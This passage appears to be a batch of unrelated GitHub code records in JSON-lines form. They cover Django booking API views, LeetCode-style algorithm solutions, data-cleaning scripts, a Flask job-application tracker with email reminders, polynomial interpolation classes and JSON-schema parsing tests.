BookingAdminDetail(generics.RetrieveUpdateDestroyAPIView):\n permission_classes = (permissions.IsAdminUser,)\n queryset = Booking.objects.all()\n serializer_class = BookingAdminSerializer\n\n\nclass BookingAdminList(generics.ListCreateAPIView):\n '''\n Only admins can create new calendar items\n '''\n permission_classes = (permissions.IsAdminUser,)\n serializer_class = BookingAdminSerializer\n\n\n def get_queryset(self):\n \"\"\"\n \"\"\"\n queryset = Booking.objects.all()\n start = self.request.query_params.get('start', None)\n end = self.request.query_params.get('end', None)\n if start and end:\n queryset = queryset.filter(Q(start__gte=start) | Q(end__lte=end))\n return queryset\n\n\nclass BookingPriceAdminDetail(generics.RetrieveUpdateDestroyAPIView):\n permission_classes = (permissions.IsAdminUser,)\n queryset = BookingPrice.objects.all()\n serializer_class = BookingPriceAdminSerializer\n\n\nclass BookingPriceAdminList(generics.ListCreateAPIView):\n '''\n Only admins can create new calendar items\n '''\n permission_classes = (permissions.IsAuthenticatedOrReadOnly,\n IsAdminOrReadOnly,)\n serializer_class = 
BookingPriceAdminSerializer\n\n\n def get_queryset(self):\n \"\"\"\n \"\"\"\n queryset = BookingPrice.objects.all()\n last = self.request.query_params.get('last', None)\n # if last is not given we'll return all items\n if last:\n # fetch the latest entry only\n queryset = [queryset.order_by('-end')[0:1].get()]\n return queryset\n\n\n","repo_name":"phookit/baytreecottage","sub_path":"phookit/bookingcalendar/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19332569231","text":"def threeSum(nums):\n \"\"\"\n nums: List[int]\n rVal: List[List[int]]\n \"\"\"\n\n result = []\n nums.sort()\n \n for i in range(len(nums)):\n # Run 2Sum on each element's complement\n dict = {}\n target = 0 - nums[i]\n for j in range(len(nums)):\n if i != j:\n complement = target - nums[j]\n if complement in dict:\n newList = sorted([nums[j], complement, nums[i]])\n if newList not in result:\n result.append(newList)\n dict[nums[j]] = j\n \n return result","repo_name":"Abhinavnj/leetcode-solutions","sub_path":"three-sum.py","file_name":"three-sum.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1400582686","text":"import os\nimport json\nimport re\nfrom datetime import datetime\n\ndef load_comments_data_from_corpus(boards=[\"Gossiping\"], years=[2009], basedir='data/corpus/segmented/', ext='.json'):\n \n posts = []\n\n for board in boards:\n for year in years:\n fp = os.path.join(basedir, board, str(year))\n\n for post_name in os.listdir(fp):\n if not post_name.endswith(ext): continue\n post_path = os.path.join(fp, post_name)\n\n with open(post_path) as f:\n data = json.load(f)\n title = titleProcess(data['post_title'])\n\n posts.append({\n 'title': title['title'],\n 'isRe': title['isRe'],\n 'tag': title['tag'],\n 'id': post_name,\n 'board': board,\n 'date': datetime.fromtimestamp(int(data['post_time'])).strftime(\"%Y-%m-%d\"),\n 'author': data['post_author'],\n 'comments': data[\"comments\"],\n 'content': data[\"post_body\"],\n })\n\n return posts\n\n\ndef titleProcess(title: str):\n m = re.match('(^Re: ?)?(\\[(.+)\\] ?)?(.*)', title)\n try:\n out = {\n 'title': m[4],\n 'isRe': 0 if m[1] is None else 1,\n 'tag': m[3]\n }\n except:\n raise Exception(\"RegEx parse error\")\n return out\n\n\ndef segment(str):\n #return jieba.cut(str)\n return [str]\n\n#%%\nif __name__ == \"__main__\":\n \n import json\n with open(\"data/Gossiping/2010/20100103_2339_M.1262533140.A.CFA.json\") as f:\n data = json.load(f)","repo_name":"liao961120/ptt-network","sub_path":"pttnet/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3576486121","text":"import os\n\nallfiles = os.walk(r\"d:\\classroom\\mar27p\\demo\")\n\ncount = 0\nfor (dirname, dirs, files) in allfiles:\n for file in files:\n if file.endswith(\".py\"):\n print(dirname + \"\\\\\" + file)\n count += 1\n\nprint(count)\n","repo_name":"srikanthpragada/PYTHON_27_MAR_2023","sub_path":"demo/libdemo/list_python_files.py","file_name":"list_python_files.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71932801193","text":"import pandas as pd\nimport numpy as np\nfrom collections import 
defaultdict\n\ndef initial_drop(df):\n \"\"\"\n This function takes the pandas DataFrame containing offensive statistics and\n drops columns that do not contribute to a player's production\n Args:\n df: pandas DataFrame object\n Returns:\n pandas DataFrame\n \"\"\"\n drop_list = ['teamID', 'lgID', 'stint']\n return df.drop(drop_list, axis=1) # drop() returns a new DataFrame; the original is left unchanged\n\ndef combine_stints(df):\n \"\"\"\n This function takes a pandas DataFrame and combines multiple 'stints' in one\n year into one total row for the year regardless of the team played for or league\n played in\n Args:\n df: pandas DataFrame object\n Returns:\n pandas DataFrame object that has combined players' stats across 'stints'\n \"\"\"\n print('Combining multiple stints into single years...')\n df = df.groupby(['playerID', 'yearID']).sum()\n return df.reset_index(level=['playerID', 'yearID'])\n\ndef map_position(batting_df, fielding_df):\n \"\"\"\n This function will use a DataFrame of fielding statistics to find each players'\n most played position and then add that position to the batting_df\n Args:\n batting_df: pandas DataFrame object\n fielding_df: pandas DataFrame object\n Returns:\n pandas DataFrame\n \"\"\"\n print('Mapping positions to batting stats...')\n for player in fielding_df['playerID'].unique():\n idxmax = fielding_df[fielding_df['playerID'] == player]['POS'].value_counts().idxmax()\n batting_df.loc[batting_df['playerID'] == player, 'pos'] = idxmax\n batting_df_dropped_p = batting_df.drop(batting_df[batting_df['pos'] == 'P'].index) # drop pitchers\n batting_df_dropped_p_null = batting_df_dropped_p.dropna() # drop players with no position\n\n return batting_df_dropped_p_null\n\ndef condense_df(df0):\n \"\"\"\n This function condenses all the rows of a player's stats over time into one\n row of stats over time\n Args:\n df0: pandas DataFrame\n Returns:\n pandas DataFrame\n \"\"\"\n df = df0.set_index('playerID')\n player_list = []\n for player in df.index.unique():\n def_dict = defaultdict(str)\n def_dict['playerID'] = player\n\n if isinstance(df.loc[player, 'pos'], str):\n def_dict['pos'] = df.loc[player, 'pos']\n else:\n def_dict['pos'] = df.loc[player, 'pos'].unique()[0]\n\n for col in df.columns:\n if col == 'yearID' or col == 'pos':\n continue\n try:\n for i, v in enumerate(df.loc[player, col]):\n if i > 6:\n continue\n key = 'year' + str(i + 1) + '_' + col\n def_dict[key] = v\n except:\n continue # skip players with only 1 year of data\n player_list.append(def_dict)\n new_df = pd.DataFrame(player_list)\n new_df_na_dropped = new_df.dropna() #drop players without 7 years of data\n new_df_w_dummies = pd.get_dummies(new_df_na_dropped, columns=['pos'])\n return new_df_w_dummies\n\ndef trim_batters(df, ab=100):\n # remove those seasons where batter had less than 100 ABs\n df = df[df['AB'] > ab]\n\n # remove batters with less than 7 years experience\n s = df['playerID'].value_counts()\n df = df[df['playerID'].isin(s[s > 6].index)]\n\n # select first 7 seasons\n df = df.groupby('playerID').head(7)\n\n return df.drop(['H', 'AB'], axis=1)\n","repo_name":"aaronmcd1214/Capstone","sub_path":"src/data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3346020277","text":"\"\"\"\r\nBrute-force enumeration: too slow (times out).\r\n\"\"\"\r\n\r\nclass Solution:\r\n def findContinuousSequence(self, target: int):\r\n i = 1\r\n nums = []\r\n result = []\r\n while i < target:\r\n nums.append(i)\r\n 
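# build the candidate pool [1, 2, ..., target-1]; values >= target can never appear in a valid consecutive-sum sequence\r\n 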
i += 1\r\n\r\n for i in range(len(nums) // 2):\r\n for j in range(i + 1, len(nums) + 1):\r\n res = nums[i:j]\r\n if sum(res) == target:\r\n result.append(res)\r\n return result\r\n\r\nprint(Solution().findContinuousSequence(15))\r\n\r\n\"\"\"\r\nSliding-window idea, implemented with two pointers.\r\n\r\n1. When the window sum is less than target, the sum must grow, so widen the window: move the right boundary to the right.\r\n2. When the window sum is greater than target, the sum must shrink, so narrow the window: move the left boundary to the right.\r\n\r\n3. When the window sum equals target exactly, record the result. If the current window is [i, j),\r\nwe have found the one and only sequence starting at i; the next step is to look for a sequence starting at i + 1, so the left boundary again moves to the right.\r\n\"\"\"\r\n\r\nclass Solution:\r\n def findContinuousSequence(self, target: int):\r\n i = 1\r\n j = 1\r\n sum = 0\r\n result = []\r\n while i <= target // 2:\r\n if sum < target:\r\n sum += j\r\n j += 1\r\n elif sum > target:\r\n sum -= i\r\n i += 1\r\n else:\r\n res = list(range(i, j))\r\n result.append(res)\r\n sum -= i\r\n i += 1\r\n return result","repo_name":"Hegemony/Python-Practice","sub_path":"剑指 Offer/57-2. findContinuousSequence.py","file_name":"57-2. findContinuousSequence.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22657610974","text":"import praw\r\nimport pandas as pd\r\n\r\nreddit = praw.Reddit(client_id='###', client_secret='####', redirect_uri='http://localhost:8080', user_agent='webscrapping')\r\n\r\nposts=[]\r\nhot_posts= reddit.subreddit('pennystocks')\r\n\r\nfor post in hot_posts.new(limit=5) :\r\n posts.append([post.title, post.url])\r\n\r\nposts = pd.DataFrame(posts, columns= ['title', 'url'])\r\nprint(posts)\r\n","repo_name":"Amimaht/Webscraper","sub_path":"redditScraper.py","file_name":"redditScraper.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33340572161","text":"class Solution:\n def subarraysDivByK(self, nums: List[int], k: int) -> int:\n n = len(nums)\n prefix = [0]\n for num in nums:\n prefix.append((prefix[-1]+(num%k))%k)\n res = 0\n freq = defaultdict(int)\n for i in range(n+1):\n if freq[prefix[i]]:\n res += freq[prefix[i]]\n freq[prefix[i]] += 1\n return res\n ","repo_name":"natitedros/Competitive-Programming","sub_path":"Prefix Sum/SubarraySumsDivisibleByK.py","file_name":"SubarraySumsDivisibleByK.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6567104193","text":"#! 
/usr/bin/env python\n\nimport clip, logging, logtool\nfrom .config import Config, load_config\n\nLOG = logging.getLogger (__name__)\n\n@logtool.log_call\ndef do (**kwargs):\n load_config (kwargs[\"templates\"])\n f = kwargs.get (\"output\")\n formats = (None, \"JSON\", \"json\", \"YAML\", \"yaml\", \"yml\", \"TOML\", \"toml\")\n if f not in formats:\n clip.exit (err = True,\n message = \"Unknown format (%s), not one of: %s\" % (f, formats))\n print (Config.dumps (form = f))\n","repo_name":"clearclaw/xxpaper","sub_path":"xxpaper/cmd_dump.py","file_name":"cmd_dump.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"72"} +{"seq_id":"40013445158","text":"from __future__ import annotations\nimport atexit\nimport re\nfrom typing import Match, Optional\nfrom logging import basicConfig, DEBUG\nimport locale\nimport os\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom pytz import timezone\nfrom flask import Flask, request, flash, url_for, redirect, render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom sqlalchemy import DateTime, desc\nfrom validators import url\nfrom apscheduler.schedulers.background import BackgroundScheduler\nimport logging\nfrom tools.send_emails import send_email\n\napp = Flask(__name__, static_folder='static', static_url_path='/static')\n# Set the environment (development, production, etc.)\n# Replace 'development' with the appropriate value for your environment\napp.config.from_object('config.Config')\n\ntoolbar = DebugToolbarExtension(app)\nparis = timezone('Europe/Paris')\nregex = r'\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Z|a-z]{2,7}\\b'\n\ndb = SQLAlchemy(app)\nlocale.setlocale(locale.LC_TIME, 'fr_FR')\nbasicConfig(level=DEBUG)\n\n\nclass Job(db.Model):\n id = db.Column('job_id', db.Integer, primary_key=True)\n name = db.Column(db.String(100))\n url = db.Column(db.String(100))\n zipCode = db.Column(db.String(5))\n company = db.Column(db.String(20))\n contact = db.Column(db.String(20))\n email = db.Column(db.String(40))\n applicationDate = db.Column(db.DateTime, nullable=False)\n active = db.Column(db.Integer)\n is_capture = db.Column(db.Integer)\n relaunchDate = db.Column(db.DateTime)\n refusalDate = db.Column(db.DateTime)\n\n def __repr__(self):\n return f'{self.name}'\n\n def __init__(self, name: str, url: str, zipCode: str, company: str, contact: str, date: DateTime, email: str):\n self.name = name\n self.url = url\n self.zipCode = zipCode\n self.company = company\n self.contact = contact\n self.applicationDate = date\n self.email = email\n self.relaunchDate = None\n self.refusalDate = None\n self.active = True\n\n @property\n def valid_url(self) -> bool:\n try:\n result = url(self.url)\n # request_response = requests.head(self.url)\n except Exception:\n return False\n return result\n\n @property\n def first_name(self) -> Optional[str]:\n return self.contact.split()[0] if self.contact else ''\n\n @property\n def expired(self) -> bool:\n if not self.refusalDate and self.email:\n # app.logger.debug(self.first_name)\n # Calculate the difference between the two dates\n if self.relaunchDate:\n difference = relativedelta(datetime.now(), self.relaunchDate)\n return difference.months >= 1\n else:\n difference = relativedelta(datetime.now(), self.applicationDate)\n app.logger.debug(self.applicationDate)\n app.logger.debug(f'{difference.days} days - {difference.months} months')\n return 
difference.days >= 10\n return False\n\n def capture_exists(self) -> bool:\n path = os.path.dirname(__file__)\n file_name: str = f'capture_{self.id}.pdf'\n return os.path.isfile(f'{path}/static/images/{file_name}')\n\n\ndef check(email: str) -> Match[str] | None:\n return re.fullmatch(regex, email)\n\n\ndef send_fake_email(job: Job, author: str, cv_resume: str) -> bool:\n if job.name == 'Prise de contact':\n subject: str = f'Relance suite prise de contact'\n content: str = f'''Nous avons échangé le {job.applicationDate.strftime('%d %B %Y')} concernant des offres d'emploi auprès de votre société pouvant correspondre à mon profil.
    \n
    \nJe me permets de vous relancer mensuellement pour connaître le statut d'avancement de ma candidature auprès de votre société.
    \n'''\n else:\n subject: str = f'Relance candidature {job.name}'\n content: str = f'''J'ai postulé le {job.applicationDate.strftime('%d %B %Y')} à l'offre \\\"{job.name}\\\" au sein de votre société.

    \nJe me permets de vous demander si ce poste est toujours vacant et si dans le cas contraire, vous auriez actuellement des missions en adéquation avec mon profil.
    \n'''\n\n body = f'''Bonjour {job.first_name},
    \n
    {content}
    \nEn vous remerciant pour votre retour.
    \n
    \nCordialement,
    \n{author}.
    \n{cv_resume}.
    \n(mail généré par automate Flask-APScheduler)'''\n\n # if send_email_old(to=job.email, subject=f'Relance candidature {job.name}', body=body):\n if send_email(subject=subject,\n body=body,\n sender_email=app.config['GMAIL_USER'],\n recipient_email=f'\"{job.first_name}\"<{job.email}>',\n bcc_recipients=[app.config['GMAIL_USER']],\n smtp_server=app.config['SMTP_SERVER'],\n smtp_port=app.config['SMTP_PORT'],\n username=app.config['GMAIL_USER'],\n password=app.config['GMAIL_APP_PWD'],\n author=app.config['GMAIL_FULLNAME'],\n ):\n job.relaunchDate = datetime.now(paris)\n db.session.commit()\n return True\n return False\n\n\ndef send_reminders():\n with app.app_context():\n # date: str = datetime.now().strftime(\"%A, %d. %B %Y %I:%M:%S %p\")\n jobs = Job.query.filter(Job.active).all() if app.config['ALL_CONTACTS'] else Job.query.filter((Job.active) & (Job.contact == 'Fifi')).all()\n for job in jobs:\n if not job.refusalDate and job.email:\n app.logger.debug(job.first_name)\n # Calculate the difference between the two dates\n if job.relaunchDate:\n difference = relativedelta(datetime.now(), job.relaunchDate)\n else:\n difference = relativedelta(datetime.now(), job.applicationDate)\n # app.logger.debug(f'months = {difference.months} - days = {difference.days}')\n if difference.months >= 1: # and difference.years == 0 and difference.days == 0:\n if send_fake_email(job=job, author=app.config['GMAIL_FULLNAME'], cv_resume=app.config['CV_RESUME']):\n app.logger.debug(f'Message sent to {job.email}.')\n\n\n# if __name__ == '__main__':\n\n@app.route('/')\ndef show_all():\n app.logger.debug('This is a debug message.')\n # Reverse order query\n jobs = Job.query.filter(Job.active).order_by(desc(Job.applicationDate)).all()\n return render_template('index.html', jobs=jobs)\n\n\n@app.route('/new/', methods=['GET', 'POST'])\ndef new():\n if request.method == 'POST':\n email: str = request.form['email']\n if not (request.form['name'] and request.form['url'] and request.form['company']):\n flash('Please enter all the fields', 'error')\n elif email and not check(email):\n flash(f'Invalid E-Mail {email}!', 'error')\n else:\n job = Job(name=request.form['name'], url=request.form['url'],\n zipCode=request.form['zipCode'], company=request.form['company'],\n contact=request.form['contact'], date=datetime.now(paris), email=email)\n # logging.warning(\"See this message in Flask Debug Toolbar!\")\n job.is_capture = job.capture_exists()\n db.session.add(job)\n db.session.commit()\n flash('Record was successfully added')\n return redirect(url_for('show_all'))\n # return render_template('index.html')\n\n\n@app.route('/delete/', methods=['GET', 'POST'])\ndef delete(id):\n app.logger.debug(f'Delete job #{id}')\n if request.method == 'GET':\n job = Job.query.get_or_404(id)\n app.logger.debug(f'Job debug: {job}')\n # db.session.delete(job)\n job.active = False\n db.session.commit()\n flash(f'Job offer \\\"{job.name}\\\" from \\\"{job.contact}\\\" was disabled!')\n return redirect(url_for('show_all'))\n\n\n@app.route('/update/', methods=['GET', 'POST'])\ndef update(id):\n job: Job = Job.query.get_or_404(id)\n if request.method == 'POST':\n job.name = request.form.get('name')\n job.url = request.form.get('url')\n job.zipCode = request.form.get('zipCode')\n job.company = request.form.get('company')\n job.contact = request.form.get('contact')\n job.email = request.form.get('email')\n application_date: str = request.form.get('applicationDate')\n app.logger.debug(f'application_date: {application_date}')\n job.applicationDate = 
datetime.strptime(application_date, '%Y-%m-%d') if application_date else None\n relaunch_date: str = request.form.get('relaunchDate')\n job.relaunchDate = datetime.strptime(relaunch_date, '%Y-%m-%d') if relaunch_date else None\n refusal_date: str = request.form.get('refusalDate')\n job.refusalDate = datetime.strptime(refusal_date, '%Y-%m-%d') if refusal_date else None\n db.session.commit()\n flash('Record was successfully updated')\n return redirect(url_for('show_all'))\n else:\n return render_template('update.html', job=job)\n\n\n@app.before_request\ndef create_tables():\n db.create_all()\n\n\n@app.before_request\ndef create_captures_dir():\n directory_path = f'{os.path.dirname(__file__)}/static/images'\n if not os.path.exists(directory_path):\n try:\n os.mkdir(directory_path)\n print(f\"Directory {directory_path} created successfully.\")\n except Exception as e:\n print(f\"Error creating directory: {e}\")\n\n\n# if app.config['SCHEDULER']:\n# app.logger.debug(app.config['SCHEDULER'])\n# scheduler = BackgroundScheduler()\n# scheduler.add_job(func=send_reminders, trigger=\"interval\", seconds=app.config['SCHEDULER_INTERVAL'])\n# scheduler.start()\n#\n# # Shut down the scheduler when exiting the app\n# atexit.register(lambda: scheduler.shutdown())\n\n# app.run()\n# toolbar.init_app(app)\n# app.run(debug=True, use_debugger=True, use_reloader=False)\n","repo_name":"pmourey/jobs","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":10117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4356553836","text":"import json\nfrom os import error\n\ndocs = {\n \"elipsis\": False,\n \"set\": set()\n}\n\nclass Products:\n def __init__(self, action=None, values=None) -> None:\n if values is None or action not in [\"add\", \"remove\", \"edit\"] or action is None: return None \n self.values = values; self.action = action\n if self.action.lower() == 'add': self.add()\n elif self.action.lower() == 'remove': self.remove()\n elif self.action.lower() == 'edit': self.edit()\n\n def add(self):\n self.id = self.values['id']\n before = json.load(open('products.json'))\n try: before[str(self.id)]; self.error = True\n except:\n before[str(self.id)] = {\n \"id\": self.id,\n \"details\": self.values['details'],\n \"picture\": self.values['picture'],\n \"price\": self.values['price'],\n \"name\": self.values['name'] \n }\n try:\n open('products.json', 'w').write(json.dumps(before, indent=4, sort_keys=True))\n self.error = False\n except:\n self.error = True\n\n def remove(self):\n self.id = self.values['id']\n before = json.load(open('products.json'))\n try: \n del before[str(self.id)]\n try:\n open('products.json', 'w').write(json.dumps(before, indent=4, sort_keys=True))\n self.error = False\n except:\n self.error = True\n except:\n self.error = True\n def edit(self):\n self.id = self.values['id']\n before = json.load(open('products.json'))\n try: \n before[str(self.id)] = self.values\n try:\n open('products.json', 'w').write(json.dumps(before, indent=4, sort_keys=True))\n self.error = False\n except:\n self.error = True\n except:\n self.error = True\nProducts(action='add', values={\n \"id\": 7,\n \"details\": \"Z\",\n \"picture\": \"https://picture.com/\",\n \"price\": 100,\n \"name\": \"Product 
Name\"\n})\n","repo_name":"1ExtremeDev/ProductsParser","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23115400469","text":"import numpy as np\nimport scipy.interpolate as interp\nimport warnings\nimport sys\nimport copy\nimport itertools as it\n\nwarnings.simplefilter('ignore', np.RankWarning)\n\n\ndef interp_list():\n return Lagrange_interpolator.__subclasses__()\n\ncolor = {\n 'blue': (0.06, 0.62, 0.91),\n 'green': (0.01, 0.84, 0.35),\n 'pink': (1., 0., 0.5),\n 'red': (0.97, 0.14, 0.05),\n}\n\nclass Lagrange_interpolator():\n _name = \"generic Lagrange interpolator\"\n _color = (0., 0., 0.)\n def __init__(self, x, y, args = ()):\n self.x = np.asanyarray(x, dtype = 'float64')\n self.y = np.asanyarray(y, dtype = 'float64')\n if self.x.size != self.y.size:\n print(\"Error: wrong parameters (x and y must have the same length !)\")\n sys.exit()\n self.n = self.x.size\n self.args = args\n self._build()\n def __str__(self):\n return self._name\n\n\nclass scipy_Lagrange(Lagrange_interpolator):\n \"\"\"\n Interpolation with the scipy module\n \"\"\"\n _name = \"scipy\"\n _color = color['blue']\n def _build(self):\n #self.p = np.poly1d(np.polyfit(self.x, self.y, self.n))\n self.p = interp.lagrange(self.x, self.y)\n def eval(self, xx):\n return self.p(xx)\n\n\nclass vdm(Lagrange_interpolator):\n \"\"\"\n Interpolation with the Vandermonde matrices\n the polynomial is written in the canonical basis\n \"\"\"\n _name = \"vandermonde\"\n _color = color['red']\n def _build(self):\n # build the Vandermonde matrix\n A = np.ones((self.n, self.n))\n for k in range(1, self.n):\n A[:, k] = A[:, k-1] * self.x\n # solve the linear system\n self.p = np.linalg.solve(A, self.y)\n def eval(self, xx):\n # evaluate the polynomial with the Horner algorithm\n xx = np.asanyarray(xx, dtype = 'float64')\n yy = np.zeros(xx.shape)\n for k in range(self.n-1,-1,-1):\n yy *= xx\n yy += self.p[k]\n return yy if xx.size != 1 else np.asscalar(yy)\n\n\nclass Lagrange(Lagrange_interpolator):\n \"\"\"\n Interpolation with the Lagrange formula\n the polynomial is written in the dual basis of the interpolation points\n\n P(x) = \\sum_{i=1}^n y_i/((x-x_i)\\omega'_n(x_i)) / \\sum_{i=1}^n 1/((x-x_i)\\omega'_n(x_i))\n \"\"\"\n _name = \"Lagrange\"\n _color = color['pink']\n def _build(self):\n # build the omega'_n(x_i)\n w = np.ones((self.n, ))\n for i in range(self.n):\n for j in it.chain(range(i), range(i+1, self.n)):\n w[i] *= (self.x[i] - self.x[j])\n self.weight = 1./w\n def eval(self, xx):\n # evaluate the polynomial\n if xx.size == 1:\n N, D = 0., 0.\n for i in range(self.n):\n if xx == self.x[i]:\n return self.y[i]\n dxi = self.weight[i] / (xx-self.x[i])\n N += self.y[i] * dxi\n D += dxi\n else:\n N, D = np.zeros(xx.shape), np.zeros(xx.shape)\n ind = []\n for i in range(self.n):\n ind.append(np.where(xx == self.x[i])) # indices where P(xi) = yi\n indloc = np.where(xx != self.x[i])\n dxi = self.weight[i] / (xx[indloc] - self.x[i]) # avoid divide by 0\n N[indloc] += self.y[i] * dxi\n D[indloc] += dxi\n for i in range(self.n): # fix yi in xi\n N[ind[i]], D[ind[i]] = self.y[i], 1.\n return N / D\n\n\nclass divided_differences(Lagrange_interpolator):\n \"\"\"\n Interpolation using the divided differences method\n the polynomial is written in the basis of the omega_k\n\n omega_0 = 1\n omega_j = (X-x_1)...(X-x_j), 1 \\leq j \\leq n\n\n P = \\sum_{k=0}^{n-1} d_{k,k} omega_k\n \"\"\"\n 
_name = \"divided differences\"\n _color = color['green']\n def _build(self):\n # build the divided differences\n self.d = copy.copy(self.y)\n for i in range(1, self.n):\n self.d[i:] = (self.d[i:] - self.d[i-1:-1]) / (self.x[i:] - self.x[:self.n-i])\n def eval(self, xx):\n xx = np.asanyarray(xx, dtype = 'float64')\n yy = self.d[-1] * np.ones(xx.shape)\n for k in range(self.n-2, -1, -1):\n yy *= xx - self.x[k]\n yy += self.d[k]\n return yy if xx.size != 1 else np.asscalar(yy)\n","repo_name":"Phinease/Numerical_modeling_and_simulation","sub_path":"lib/pyInterp.py","file_name":"pyInterp.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30790605303","text":"import pytest\nfrom dataformats.jsonschema.custom_types import SchemaType\nfrom dataformats.jsonschema.json_pointer import Pointer\nfrom dataformats.jsonschema.mixins.schema_parsing import (\n absolute_id_map,\n find_parent_pointers,\n find_schemas,\n flatten_json,\n is_absolute,\n normalize,\n ref_map,\n)\n\n\ndef test_flatten_json():\n json_schema: SchemaType = {\"properties\": {\"somekey\": {\"allOf\": [{\"default\": \"somevalue\"}]}}}\n flat_json_schema = flatten_json(json_schema)\n assert flat_json_schema[Pointer.from_string(\"/properties\")] == json_schema[\"properties\"]\n assert flat_json_schema[Pointer.from_string(\"/properties/somekey\")] == json_schema[\"properties\"][\"somekey\"] # type: ignore\n assert flat_json_schema[Pointer.from_string(\"/properties/somekey/allOf\")] == json_schema[\"properties\"][\"somekey\"][\"allOf\"] # type: ignore\n assert flat_json_schema[Pointer.from_string(\"/properties/somekey/allOf/0\")] == json_schema[\"properties\"][\"somekey\"][\"allOf\"][0] # type: ignore\n assert flat_json_schema[Pointer.from_string(\"/properties/somekey/allOf/0/default\")] == json_schema[\"properties\"][\"somekey\"][\"allOf\"][0][\"default\"] # type: ignore\n\n\ndef test_find_schemas():\n top_level_schema = {\"definitions\": {\"a\": {\"id\": \"subschema\"}}, \"not-a-schema\": {\"type\": \"str\"}}\n schemas = find_schemas(top_level_schema)\n # assert Pointer() in schemas\n assert Pointer.from_string(\"/definitions/a\") in schemas\n assert Pointer.from_string(\"/note-a-schema\") not in schemas\n\n\ndef test_find_schemas_():\n schema: SchemaType = {\n \"definitions\": {\n \"actual ref\": {\"$ref\": \"#\"},\n }\n }\n schemas = find_schemas(schema)\n assert len(schemas) == 2\n\n\ndef test_find_parent_pointer():\n child = Pointer.from_string(\"/some/nested/pointer\")\n possible_parents = [\n Pointer.from_string(\"/some/nested\"),\n Pointer.from_string(\"/some\"),\n Pointer.from_string(\"\"),\n Pointer.from_string(\"i dont belong here\"),\n ]\n parent_iterator = find_parent_pointers(child, possible_parents)\n assert next(parent_iterator) == possible_parents[0]\n assert next(parent_iterator) == possible_parents[1]\n assert next(parent_iterator) == possible_parents[2]\n with pytest.raises(StopIteration):\n next(parent_iterator)\n\n\ndef test_normalize_defrag():\n uri = \"HTTPs://www.ugLy.com/with space/index.html#fragment\"\n normalized_uri = normalize(uri, defrag=True)\n assert normalized_uri == \"https://www.ugly.com/with%20space/index.html\"\n\n\ndef test_normalize_no_defrag():\n uri = \"HTTPs://www.ugLy.com/with space/index.html#fragment\"\n normalized_uri = normalize(uri, defrag=False)\n assert normalized_uri == \"https://www.ugly.com/with%20space/index.html#fragment\"\n\n\ndef test_is_absolute():\n assert 
is_absolute(\"file://somepath\")\n assert is_absolute(\"https://www.jsonschema.org/\")\n assert not is_absolute(\"other_schema.json\")\n assert not is_absolute(\"../sibling.json#/defintions/a\")\n\n\ndef test_absolute_id_map():\n schema = {\n \"id\": \"https://schemstore.com/schemas/example.json\",\n \"definitions\": {\n \"relative_change\": {\"id\": \"other.json\"},\n \"relative_change_with_fragment\": {\"id\": \"another.json#withfragment\"},\n \"nested\": {\n \"id\": \"https://nested.com/parent.json\",\n \"items\": {\"$comment\": \"resolves to https://nested.com/child.json\", \"id\": \"child.json\"},\n },\n },\n }\n absolute_ids = absolute_id_map(schema)\n # raise ValueError(absolute_ids.keys())\n assert absolute_ids[Pointer.from_string(\"\")] == \"https://schemstore.com/schemas/example.json\"\n assert (\n absolute_ids[Pointer.from_string(\"/definitions/relative_change\")] == \"https://schemstore.com/schemas/other.json\"\n )\n assert (\n absolute_ids[Pointer.from_string(\"/definitions/relative_change_with_fragment\")]\n == \"https://schemstore.com/schemas/another.json\"\n )\n assert absolute_ids[Pointer.from_string(\"/definitions/nested/items\")] == \"https://nested.com/child.json\"\n\n\ndef test_ref_map():\n schema: SchemaType = {\n \"definitions\": {\n \"not a ref\": {\"$ref\": 0},\n \"also not ref\": {\"enum\": [{\"$ref\": \"#\"}]},\n \"actual ref\": {\"$ref\": \"#\"},\n \"ref deleted twice\": {\"enum\": {\"default\": \"$ref\"}},\n }\n }\n refs = ref_map(schema)\n assert len(refs) == 1\n assert Pointer.from_string(\"/definitions/actual ref\") in refs\n\n\n@pytest.mark.xfail(\n raises=ValueError,\n reason=\"This should never occur, the id should always be set or fail when trying to do a relative deref without known id\",\n)\ndef test_id_map_no_id_top_level():\n schema: SchemaType = {\n \"properties\": {\n \"derefenced_relative_id\": {\n \"id\": \"some_relative_id/i-was-imported.json\",\n \"properties\": {\n \"relative_base_uri_change\": {\n \"$comment\": \"This should resolve to some_relative_id/other.json\",\n \"id\": \"other.json\",\n }\n },\n }\n }\n }\n absolute_ids = absolute_id_map(schema)\n assert 